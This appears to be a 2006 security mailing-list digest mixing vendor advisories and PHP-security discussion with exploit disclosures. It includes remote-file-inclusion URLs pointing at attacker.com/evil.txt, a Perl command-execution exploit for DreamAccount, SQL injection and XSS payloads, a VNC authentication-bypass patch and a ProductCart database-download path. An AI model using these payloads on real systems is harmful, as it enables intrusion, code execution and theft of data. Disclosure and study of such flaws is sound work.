Re: Opera 9 DoS PoC
On 21 Jun 2006 03:39:09 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: Details: Vulnerability can be exploited by using a large value in a href tag to create an out-of-bounds memory access. Proof Of Concept DoS exploit: http://www.critical.lt/research/opera_die_happy.html Interesting enough, clicking on that link under Firefox 1.5.0.4 made it hang for about 20 seconds, consuming 100% cpu time. Probably not a vulnerability, although it could be "exploited" to annoy users. -- Bruno Lustosa <[EMAIL PROTECTED]> http://www.lustosa.net/
Re: PHP security (or the lack thereof)
> I think that any ability of the (l)users to expose executables as web > services threatens the security of the web server machine, irrespective of > programming language. (But I don't see how it threatens "the internet" -- > they can already connect their own misconfigured machine to the net directly) If I compromise your home machine, I've got one computer. If I compromise some webserver that hosts several hundred websites I've got a whole lot more options via all those exploits that require I lure you to my website. I also have whatever those websites are (suppose half of them are stores that process credit cards). Geo.
Re: Sendmail MIME DoS vulnerability
On Tue, 20 Jun 2006, Jain, Siddhartha wrote: > Hi, > > I am trying to understand how the below mentioned sendmail > vulnerability. > http://www.sendmail.com/security/advisories/SA-200605-01.txt.asc > > The description says that the DoS occurs when sendmail goes in a deeply > nested malformed MIME message and uses the MIME 8-bit to 7-bit > conversion function. Under what conditions would sendmail use the MIME > 8-bit to 7-bit function? Only when the remote MTA doesn't understand > 8-bit MIME, right? > > That would mean that a malicious user would have to force the victim MTA > to relay the malformed mail to a MIME 7-bit-only MTA for the attack to > succeed. This probably means that open relays and ISP SMTP servers are > more vulnerable than purely incoming SMTP servers. > > I am just trying to make sense of the advisory and the possible threat > of exploit. I didn't understand at first, either. As I attributed it to the DATA part of the message. Apparently sendmail is smart enough to prevent the message from not reaching the other side due to breakage using this. But I don't get it completely yet. Gadi. > > > Thanks, > > - Siddhartha >
[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability
Title: [Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability Author: Kil13r - http://www.kil13r.info/ Local / Remote: Remote Timeline: 2006/06/21 - Discovery 2006/06/21 - Vendor notification 2006/06/21 - Vendor response 2006/06/22 - Release Affected version: Namo DeepSearch 4.5 or earlier Not affected version: Description: Namo DeepSearch is search engine solution, but that has vulnerability. It can run arbitrary Javascript code by end user in search engine. If victim execute arbitrary Javascript code, attacker can steal victim's cookie. Edit Namo DeepSearch HTML template to workaround. Proof of Concept code: None Proof of Concept example: http://www.victim.com/cgi-bin/mclient.cgi?p=";>alert(String.fromCharCode(88,83,83,32,53580,49828,53944)) Proof of Concept screenshot: http://www.kil13r.info/sa/xss/deepsearchxss.jpg - Igitur qui desiderat pacem, praeparet bellum.
Re: Bypassing of web filters by using ASCII
On 6/21/06 3:24 PM, "Paul" <[EMAIL PROTECTED]> spoketh to all: >>> At >>> >>> >>> http://www.iku-ag.de/ASCII >>> >>> >>> you can find a test page that displays a secret message. IE6 displays >>> >>> the text correctly, Firefox 1.5 and Opera 8.5 display glibberish text. Safari 2.0.3 also displays "glibberish text." t
SYMSA-2006-005
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID : SYMSA-2006-005 Advisory Title: Lanap CAPTCHA bypass exposure Author: Michael White, [EMAIL PROTECTED] and Graham Murphy, [EMAIL PROTECTED] Release Date : 23-06-2006 Application : BotDetect Lanap CAPTCHA component Platform : ASP.NET Severity : Low/Limited exposure Vendor status : Vendor verified, patch available CVE Number: CVE-2006-2918 Reference : http://www.securityfocus.com/bid/18315 Overview: The CAPTCHA component for ASP.NET provided by Lanap may be completely bypassed, thus undermining the security benefit of the CAPTCHA technology. Details: During a consulting engagement, Symantec identified that the Lanap CAPTCHA component stores the UUID and hash for a given CAPTCHA within the page ViewState. By replaying the ViewState for a known number, a remote attacker may avoid the CAPTCHA entirely. This behaviour is dependent on the way in which the Lanap component is integrated, however numerous examples including Lanap's demo code are identified as exhibiting this behaviour. Vendor Response: The above vulnerability has been fixed in the latest release of the product, BotDetect ASP.NET CAPTCHA 1.5.4.0. Licensed and evaluation versions of Lanap BotDetect ASP.NET CAPTCHA are available for customer download from the Lanap website at http://www.lanapsoft.com If there are any further questions about this statement, please contact Lanap support. Recommendation: Upgrade to the latest release of the product, BotDetect ASP.NET CAPTCHA 1.5.4.0. Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2006-2918 - - - - ---Symantec Vulnerability Research Advisory Information--- For questions about this advisory, or to report an error: [EMAIL PROTECTED] For details on Symantec's Vulnerability Reporting Policy: http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf Symantec Vulnerability Research Advisory Archive: http://www.symantec.com/research/ Symantec Vulnerability Research GPG Key: http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc - - - - -Symantec Product Advisory Information- To Report a Security Vulnerability in a Symantec Product: [EMAIL PROTECTED] For general information on Symantec's Product Vulnerability reporting and response: http://www.symantec.com/security/ Symantec Product Advisory Archive: http://www.symantec.com/avcenter/security/SymantecAdvisories.html Symantec Product Advisory PGP Key: http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc - - - - --- Copyright (c) 2006 by Symantec Corp. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Consulting Services. Reprinting the whole or part of this alert in any medium other than electronically requires permission from [EMAIL PROTECTED] Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Symantec, Symantec products, and Symantec Consulting Services are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEmZKGuk7IIFI45IARAshOAJ9/x0C9NsmCuo43amlpnOAGKtonPgCg2XPQ dBEH77ubEwyEjWGaFiTt4bw= =QhH/ -END PGP SIGNATURE-
WBB<<---v2.3.1"report.php" SQL Injection
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /report.php?postid=[SQL] Email: CrAzY.CrAcKeR(at)hotmail(dot)com
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
ECHO.OR.ID ECHO_ADV_34$2006 --- [ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion --- Author : Dedi Dwianto a.k.a the_day Date Found : June, 20th 2006 Location: Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv34-theday-2006.txt Critical Lvl: Highly critical Impact : System access Where : From Remote --- Affected software description: ~~ W-Agora (Web-Agora) Application : W-Agora (Web-Agora) version : <= 4.2.0 URL : http://w-agora.net Description : W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and display messages, files, and other information on your web site. More than "just another Web BBS/forum software", W-Agora is designed so it can be easily customizable through a Web browser and the use of templates. It can be used as a BBS, guestbook, download area, or publishing system. Several database backends are supported such as MySQL, Postgres, mSQL, Oracle and DBM. --- Vulnerability: ---insert.php-- indexNotes(); } ?> ... -- Input passed to the "inc_dir" parameter in insert.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources Affected files: admin_notes.php admin_subscribed_user.php admin_user.php browse_avatar.php close.php create_forum.php create_site.php create_user.php delete.php delete_site.php download_forum.php editconf.php edit_site.php export.php forgot_password.php index.php insert.php search.php view.php update.php setup.php profile.php register.php rss.php list.php forgot_password.php include/mail.php include/fileupload.php include/msql.php include/dbaccess.php include/form.php include/postgres65.php include/postgres.php include/mysql.php extras/quicklist.php extras/shared_user.php user/ldap_example.php tools/upgrade_401.php tools/upgrade_402.php tools/upgrade_42.php tools/upgrade_site_401.php tools/upgrade_site_402.php Successful exploitation requires that "register_globals= Off ". Proof Of Concept: ~ http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt? http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt? and more Affected files Solution: ~ Change register_globals= On in php.ini --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten ~ Lieur-Euy,Mr_ny3m,bithedz,an0maly ~ newbie_hacker[at]yahoogroups.com ~ #aikmel #e-c-h-o @irc.dal.net --- Contact: the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ [ EOF ] --
Re: PHP security (or the lack thereof)
--- Darren Reed <[EMAIL PROTECTED]> wrote: > From my own mail archives, PHP appears to make up at least 4% > of the email to bugtraq I see - or over 1000 issues since 1995, > out of the 25,000 I have saved. > > People complain about applications like sendmail...in the same > period, it has been resopnsible for less than 200. > > Do we have a new contender for worst security offender ever > written ? I guess most of the remaining offending apps were written in C: as much as 96% ?!! (including basically all of microsoft's stuff!!) Surely the least secure language of all time !!! Note also that no vulnerable apps were written in: - cobol, rpg3, prolog, ada, scheme, lisp, pl/1, occam, modula-2, or MIX We're planning to roll out our next enterprise ecommerce grid as a set of modula-2 plugins to cobol-based container controlled by a dynamic gridded application matrix written in prolog, all running on highly parallel lisp machines. ;) john ___ All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease of use." - PC Magazine http://uk.docs.yahoo.com/nowyoucan.html
Calendar ( Provided by Codewalkers ) - SQL Injection
[P]roduit : Calendar Provided by Codewalkers [S]ite officiel : http://Calendar.codewalkers.com [V]ulnérabilité : SQL Injection [E]xploitation : /calendar.php?display=event&id=[SQL] [C]rédit : Silitix - www.Silitix.com [A]vis de sécurité original : www.Silitix.com/calendar-cws.php [G]reetz : Simo64 / MSRT / VeNoM630 / CrAsH_oVeR_rIdE ... :)
Re: PHP security (or the lack thereof)
[EMAIL PROTECTED] wrote: > Trying to make the language 'safe' won't fix it because the language is not > the problem. The real problem is the way PHP is presented to most new > developers. > > > PHP has been introduced as a tool for the web developer. As a language its > goal is "to allow web developers to write dynamically generated pages > quickly." ( http://www.php.net/manual/en/faq.general.php ). The focus then > is to enable the web developer by giving him the tools he needs to create > dynamic content, with as little hassle as possible. The web developer need > only read a short tutorial ( http://www.php.net/manual/en/tutorial.php ) and > he is ready to read, understand and implement the ideas presented in the > various example scripts on PHP.net. Unfortunately this situation leaves the > web developer uninformed and unprepared to face the hostile environment that > is the net. > That is a fascinating perspective. Web developers who work with static content (HTML and images, etc.) is pretty secure: the security threat amounts to Apache configuration (directory browsing and htpasswd stuff) and it is pretty difficult for an attacker to corrupt static content by way of the content. Dynamic content, while not inherently dangerous, becomes dangerous when you hand the web developer a Turing-complete language. Suddenly the exact behavior of the web site under arbitrary input becomes undecidable. Programmers (mostly) know this. Security developers (should) know this. Web artists may have just been introduced to programming to get their web site to be dynamic. There are two possible approaches to fixing this. One, as nabiy suggests, is to change how PHP is presented to web developers. Label it as a chain saw, and point out that chain saws don't know the difference between "log" and "leg" :) The other is to contrive a language that is both sufficient for dynamic web content development, and also *not* Turing-complete. I have no idea what such a language might look like, or even whether the intersection of these two requirements is the null set. For more on Turing completeness and security, consider coming to USENIX Security 2006 and see my talk on this topic "Turing Around the Security Problem" http://www.usenix.org/events/sec06/tech/#thurs Crispin -- Crispin Cowan, Ph.D. http://crispincowan.com/~crispin/ Director of Software Engineering, Novell http://novell.com
Re: Opera 9 DoS PoC
Tested and confirmed on Opera 9.00 built 8482. Interesting this also managed to crash Notepad.exe on Windows XP SP2 Home Edition when viewing the source of the page in IE7 Beta 2. Darren Clarke IT / Comms Admin - Critical Security advisory #009 [http://www.critical.lt] Advisory can be reached: http://www.critical.lt/?vuln/349 We are: N9, bigb0u, cybergoth, iglOo, mircia, Povilas Shouts to Lithuanian girlz! and our friends ;] Product: Opera 9 (8.x is immune to this) Vuln type: Denial of Service Risk: moderated Attack type: Remote Details: Vulnerability can be exploited by using a large value in a href tag to create an out-of-bounds memory access. Proof Of Concept DoS exploit: http://www.critical.lt/research/opera_die_happy.html Research was originaly done by Povilas Tumėnas a.k.a. N9 P.S. To Opera Team, we like your browser and want it to be as good as possible.
[KAPDA]MyBB1.1.3~Option update for code buttons~Sql Injection Admin Access
ORIGINAL ADVISORY: http://myimei.com/security/2006-06-21/mybb113option-update-for-code-buttonssql-injection-admin-access.html http://www.kapda.ir/page-advisory.html -Summary- Software: MyBB Sowtwares Web Site: http://www.mybboard.com Versions: 1.1.3 Class: Remote Status: Patched Exploit: Available Discovered by: imei addmimistrator Risk Level: very high Description There is a security bug in MyBB 1.1.3 software (latest version fully patched) file usercp.php that allows attacker performe a SQLINJECTION attack. READ ORIGINAL ADVISORY FOR MORE DETAILS.
WBB<<---v1.2 "showmods.php" SQL Injection
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /showmods.php?boardid=[SQL] Email: CrAzY.CrAcKeR(at)hotmail(dot)com
productcart soltan_defacer
Azhteam Digital Security Team ## ## ## # productcart # # # # Find by Soltan_defacer# # Greetings; s.defacer - azhteam - lvl3hr - edi.programer # # # # # # ~~~ # # Contact: [EMAIL PROTECTED] or http://www.azhteam.com # # # # # # # # # in Google : /productcart/ # # # # /ProductCart/ # # Urls: # # http://www.site.com/ProductCart/ # # xpl do link: # # database/EIPC.mdb depois de /ProductCart/ # # Urls xpl: http://www.site.com/ProductCart/database/EIPC.mdb # # # #
Re: Digital Armaments July-August Hacking Challange: Microsoft
[EMAIL PROTECTED] wrote: > The 5000 credits prizes will be given on the publication of a official > Microsoft Bullettin with severity High regarding the vulnerability. The Microsoft rating system does not have a "High" rating for severity. They have Low, Medium, Important and Critical. See http://www.microsoft.com/technet/security/bulletin/rating.mspx Alex
rPSA-2006-0110-1 kernel
rPath Security Advisory: 2006-0110-1 Published: 2006-06-23 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: kernel=/[EMAIL PROTECTED]:devel//1/2.6.16.22-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2445 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2448 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3085 http://issues.rpath.com/browse/RPL-457 Description: In previous kernel versions, systems that use the SCTP protocol are vulnerable to remote denial of service attacks including remotely-triggered kernel crashes, and all systems are vulnerable to local denial of service including locally-triggered kernel hangs. This update requires a reboot to implement the fixes.
Linux VNC evil client patch - BID 17978
Hi all,
I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to
authenticate to a bugged server with a NULL session, although password
authentication is required
(RealVNC Remote Authentication Bypass Vulnerability, BID 17978).
Here is the patch for file CConnection.cxx
$ cat vnc4-4.1.1+X4.3.0-NULL-Auth.patch
184,185c184,185
< // Inform the server of our decision
< if (secType != secTypeInvalid) {
---
> // Send to server NULL Auth [0x01]
> if (secType=0x01) {
Apply with
$ patch < vnc4-4.1.1+X4.3.0-NULL-Auth.patch
File to patch: vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx
patching file vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx
The original tarball is named vnc4_4.1.1+X4.3.0.orig.tar.gz:
http://ftp.debian.org/debian/pool/main/v/vnc4/vnc4_4.1.1+X4.3.0.orig.tar.gz
Have a nice day
embyte
[Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability
Title:
[Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/21 - Discovery
2006/06/21 - Vendor notification
2006/06/22 - Release
Affected version:
NetSoft SmartNet 2.0
Not affected version:
Description:
NetSoft SmartNet 2.0 is search engine solution, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.
If victim execute arbitrary Javascript code, attacker can steal victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
http://www.victim.com/dataCollector/search.jsp?searchFLD=0&tableName=_meta&keyWord=alert("XSS")
http://www.victim.com/dataCollector/search.asp?searchFLD=0&tableName=_meta&keyWord=alert("XSS")
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/smartnetxss.jpg
-
Igitur qui desiderat pacem, praeparet bellum.
DREAMACCOUNT V3.1 Remote Command Execution Exploit
DREAMACCOUNT V3.1 Command Execution Exploit
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
Coded By Drago84(Exclusive Security Team)
site of script:http://dreamcost.com
Vulnerable: DREAMACCOUNT V3.1
vulnerable file :
--
/admin/index.php
vulnerable code:
require($path . "setup.php");
require($path . "functions.php");
require($path . "payment_processing.inc.php");
$path parameter File inclusion
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print
"\n=\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print
"=\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive /Exclusive";
if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/
http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";
}
Discovered By CrAsh_oVeR_rIdE
Coded By Drago84
E-mail:[EMAIL PROTECTED]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER
,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR
AND ALL LEZR.COM Member
[ GLSA 200606-24 ] wv2: Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: wv2: Integer overflow Date: June 23, 2006 Bugs: #136759 ID: 200606-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow could allow an attacker to execute arbitrary code. Background == wv2 is a filter library for Microsoft Word files, used in many Office suites. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-text/wv2 < 0.2.3 >= 0.2.3 Description === A boundary checking error was found in wv2, which could lead to an integer overflow. Impact == An attacker could execute arbitrary code with the rights of the user running the program that uses the library via a maliciously crafted Microsoft Word document. Workaround == There is no known workaround at this time. Resolution == All wv2 users should update to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/wv2-0.2.3" References == [ 1 ] CVE 2006-2197 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2197 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200606-24.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp8DAecOQD35.pgp Description: PGP signature
Re: Re: PHP security (or the lack thereof)
Trying to make the language 'safe' won't fix it because the language is not the problem. The real problem is the way PHP is presented to most new developers. PHP has been introduced as a tool for the web developer. As a language its goal is "to allow web developers to write dynamically generated pages quickly." ( http://www.php.net/manual/en/faq.general.php ). The focus then is to enable the web developer by giving him the tools he needs to create dynamic content, with as little hassle as possible. The web developer need only read a short tutorial ( http://www.php.net/manual/en/tutorial.php ) and he is ready to read, understand and implement the ideas presented in the various example scripts on PHP.net. Unfortunately this situation leaves the web developer uninformed and unprepared to face the hostile environment that is the net. the only real solution is to change the way the language is presented to new developers. It must be presented in a manner that increases the awareness of the developer so that he able to deploy his application in a safe manner. This means that security needs to be taught from the beginning rather than as a footnote, especially on sites where authoritative teaching is given ( such as PHP.net ). - nabiy
Re: Bypassing of web filters by using ASCII
On 23 Jun 2006 at 10:35, Vincent Archer wrote: > On Fri, Jun 23, 2006 at 12:08:56AM +0200, Amit Klein (AKsecurity) wrote: > > So what I don't understand now is why IE's "solution" is any better than > > Opera/Firefox? > > > > Why is modifying the data (msb) any better than modifying the > > data-description (charset)? > > The same problem did exist in RFC821, which specified the data path as > being 7-bit, with the MSB set to 0. The venerable ancestor sendmail did > enforce that, by and-ing each and every byte with 0x7F, which means that > the IE solution is "slightly better", due to historical precedent. > If we're into precedences, does anyone know what Mosaic 1.0 used to do in such case? after all, it was probably the first widely used browser (see http://www.livinginternet.com/w/wi_browse.htm), and it made some sense (in the early 90s) to conform to its de-facto browser standard. > Not that it's good anyway. > Yep... -Amit
Cisco Secure ACS Weak Session Management Vulnerability
Cisco Secure ACS Weak Session Management Vulnerability June 23, 2006 Product Overview: Cisco Secure Access Control Server (ACS) provides a centralized identity networking solution and simplified user management experience across all Cisco devices and security management applications. Cisco Secure ACS is a major component of Cisco trust and identity networking security solutions. It extends access security by combining authentication, user and administrator access, and policy control from a centralized identity networking framework, thereby allowing greater flexibility and mobility, increased security, and user productivity gains. Vulnerability Details: A vulnerability has been identified in the Cisco Secure ACS session management architecture which could be exploited by an attacker to obtain full administrative access to the web interface and thus all managed assets (routers, switches, 802.1x authenticated networks, etc). By default, the Cisco Secure ACS web administration login page runs on TCP port 2002. Upon successful authentication, the client is then redirected to a dynamicand unique HTTP server port between 1024 and 65535. Once authenticated, ACS relies solely upon the port and the client IP address to validate the session. Clearly one can think of many somewhat trivial techniques for acquiring the necessary IP address or senarios where the attacker may already share the same source IP as the administrator (proxies, NATing devices). Now it's merely a matter of identifying the port allocated for the administrative interface. This is easily accomplished as ACS follows a simple incrementation process for port allocation. Affected Versions: Cisco Secure ACS 4.x for Windows Legacy versions may also be affected. Workarounds: Configure ACLs within Cisco Secure ACS to restrict access to the web interface from only 'secure' network address space. Cisco has confirmed this vulnerability and is working on a patch. References: http://www.cisco.com/en/US/products/sw/secursw/ps2086/index.html -- Thank you, Darren Bounds
Dating Agent PRO 4.7.1 Vulnerability
Dating Agent PRO 4.7.1 http://www.datetopia.com/datingagent/ -- - PHPinfo page /requirements.php - SQL injection - http://target.xx/picture.php?pid=1[SQL] http://target.xx/mem.php?mid=1[SQL] http://target.xx/search.php?search=3&sex=1[SQL] --- POST /search.php HTTP/1.1 Host: target.xx Content-Type: application/x-www-form-urlencoded Content-Length: 97 pictures=1&search=1&Submit2=1&Submit=1&sex=1&age1=1&age2=1&likes=1&maritalstatus=1&relationship='[SQL] --- Cross Site Scripting (XSS) --- http://target.xx/webmaster/index.php?login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&pswd=t est --- POST /search.php HTTP/1.1 Host: target.xx Content-Type: application/x-www-form-urlencoded Content-Length: 404 Cookie: PHPSESSID=d83ded192782c72c7f90adbac4127d7d;pass=test sex=1&age1=1&age2=1&likes=1&maritalstatus=Divorced&relationship=1&pictures=off&onlinet=0&search=&Submit=Search%20%26gt%3B &login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&fname=1 - Ellipsis Security http://www.ellsec.org
Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability
Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability June 23, 2006 Product Overview: Trend Micro Control Manager is a centralized, web-based outbreak management console designed to simplify enterprise-wide coordination of outbreak security actions and management of Trend Micro products and services. Trend Micro Control Manager acts as a central command center for deployment of Trend Micro's threat-specific expertise across the network and to select third-party products to proactively manage outbreaks. Vulnerability Details: Trend Micro Control Manager is vulnerable to a persistent, unauthenticated XSS attack. This vulnerability can be exploited by an attacker to obtain full administrative access to the TMCM administration console, compromising the integrity of the corporate enterprise anti-virus infrastructure. This vulnerability stems from TMCMs failure to sanitize audit log content when displaying it through the management console. As such, an attacker may inject script into the username field at the login page. Any logins, failed or successful are then available in the Access Log for execution when viewed by an authenticated administrative user. Affected Versions: Trend Micro Control Manager 3.5 Olders versions may also be affected. Workarounds: Control network access to the TMCM web console. References: http://www.trendmicro.com/en/products/management/tmcm/ Vendor was contacted on several occasions with no response. -- Thank you, Darren Bounds
aeDating 4.1 XSS
Product of AEwebworks Dating Software http://www.aewebworks.com/ --- Cross Site Scripting (XSS) --- http://target.xx:80/index.php?Sex=";>alert(/Elipsis+Security+Test/)&Mode=last ^"G4" Template work^ --- POST /join_form.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 1685 page=1&ID=1&ProfileType=">alert(/Elipsis+Security+Test/)&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren= --- POST /forgot.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 65 Email=">alert(/Elipsis+Security+Test/) - Ellipsis Security http://www.ellsec.org
TSLSA-2006-0037 - multi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2006-0037 Package names: kernel, netpbm Summary: Multiple vulnerabilities Date: 2006-06-23 Affected versions: Trustix Secure Linux 2.2 Trustix Secure Linux 3.0 - -- Package description: kernel The kernel package contains the Linux kernel (vmlinuz), the core of your Trustix Secure Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. netpbm The netpbm package contains a library of functions which support programs for handling various graphics file formats, including .pbm (portable bitmaps), .pgm (portable graymaps), .pnm (portable anymaps), .ppm (portable pixmaps) and others. Problem description: kernel < TSL 3.0 > - New upstream. - Module qlogicfc successfully replaced with qla2xxx. - Added scsi_transport_spi to initrd module list. - SECURITY FIX: A race condition error in the "posix-cpu-timers.c" script that does not prevent another CPU from attaching the timer to an exiting process, which could be exploited by attackers to cause a denial of service. - Flaw due to errors in "powerpc/kernel/signal_32.c" and "powerpc/kernel/signal_32.c", which could allow userspace to provoke a machine check on 32-bit kernels. - An infinite loop in "netfilter/xt_sctp.c", which could be exploited by attackers to exhaust all available memory resources, creating a denial of service condition. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2006-2445, CVE-2006-2448 and CVE-2006-3085 to this issue. netpbm < TSL 3.0 > < TSL 2.2 > - SECURITY Fix: A vulnerability has been reported in NetPBM, caused due to an off-by-one boundary error within "pamtofits". This can be exploited to cause a single byte buffer overflow when processing a specially crafted input file. Action: We recommend that all systems with this package installed be upgraded. Please note that if you do not need the functionality provided by this package, you may want to remove it from your system. Location: All Trustix Secure Linux updates are available from http://http.trustix.org/pub/trustix/updates/> ftp://ftp.trustix.org/pub/trustix/updates/> About Trustix Secure Linux: Trustix Secure Linux is a small Linux distribution for servers. With focus on security and stability, the system is painlessly kept safe and up to date from day one using swup, the automated software updater. Automatic updates: Users of the SWUP tool can enjoy having updates automatically installed using 'swup --upgrade'. Questions? Check out our mailing lists: http://www.trustix.org/support/> Verification: This advisory along with all Trustix packages are signed with the TSL sign key. This key is available from: http://www.trustix.org/TSL-SIGN-KEY> The advisory itself is available from the errata pages at http://www.trustix.org/errata/trustix-2.2/> and http://www.trustix.org/errata/trustix-3.0/> or directly at http://www.trustix.org/errata/2006/0037/> MD5sums of the packages: - -- ae7e3694eba27ec7af20bfadc1638315 3.0/rpms/kernel-2.6.17.1-1tr.i586.rpm cfbc555e5e86ba415ab094e974f2b6f2 3.0/rpms/kernel-doc-2.6.17.1-1tr.i586.rpm c1423efc2597311d2b3b1a8ee38ab290 3.0/rpms/kernel-headers-2.6.17.1-1tr.i586.rpm 6ec505e5241a5eb46ff8b543a414c581 3.0/rpms/kernel-smp-2.6.17.1-1tr.i586.rpm d49930ce1311746c267597ac746307d8 3.0/rpms/kernel-smp-headers-2.6.17.1-1tr.i586.rpm 02e00fa5331718396926d0a3731dfe38 3.0/rpms/kernel-source-2.6.17.1-1tr.i586.rpm f41bb3d37a2c4aa544f1f6e4febaccbe 